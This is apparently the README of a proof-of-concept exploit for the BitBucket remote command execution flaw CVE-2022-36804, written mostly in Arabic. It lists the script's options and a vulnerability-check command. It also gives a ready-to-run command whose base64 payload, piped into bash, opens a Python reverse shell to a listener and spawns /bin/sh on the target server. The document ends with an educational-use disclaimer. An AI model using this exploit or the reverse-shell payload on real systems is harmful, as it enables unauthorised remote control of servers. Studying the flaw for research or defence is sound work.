
استغلال حقيقي لـ BitBucket RCE CVE-2022-36804
يحتوي هذا المستودع على برهان مفهوم بسيط للاستغلال لثغرة تنفيذ الأوامر عن بُعد في BitBucket (CVE-2022-36804). يتطلب استغلال هذه الثغرة الوصول إلى مستودع على المثيل المستهدف، إذا لم يكن لديك بيانات اعتماد، فسيحتاج الهدف إلى مستودعات عامة.
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
[--check]
Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)
optional arguments:
-h, --help show this help message and exit
-p PROJECT, --project PROJECT
The name of the project the public repository resides in (E.g.
testproject)
-r REPO, --repo REPO The name of the public repository (E.g. testrepo)
-u URL, --url URL The URL of the BitBucket server (E.g. http://localhost:7990/)
-c COMMAND, --command COMMAND
The command to execute on the server (E.g. 'curl http://canary.domain/')
--proxy PROXY HTTP proxy to use for debugging (E.g. http://localhost:8080/)
--session SESSION The value of your 'BITBUCKETSESSIONID' cookie, required if your target
repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
--check Only perform a check to see if the instance is vulnerable
للتحقق مما إذا كان المثيل معرضًا للخطر، يمكنك تنفيذ الأمر التالي
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check
يمكن استخدام الأمر أدناه لإنشاء شل عكسي على الضحية (ستحتاج حمولة base64 إلى التحديث بتفاصيل المستمع الخاص بك)
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d | bash |"
هذا الاستغلال مخصص للأغراض التعليمية/البحثية، وأنا لست مسؤولًا عن كيفية استخدام الناس له. كن لطيفًا :)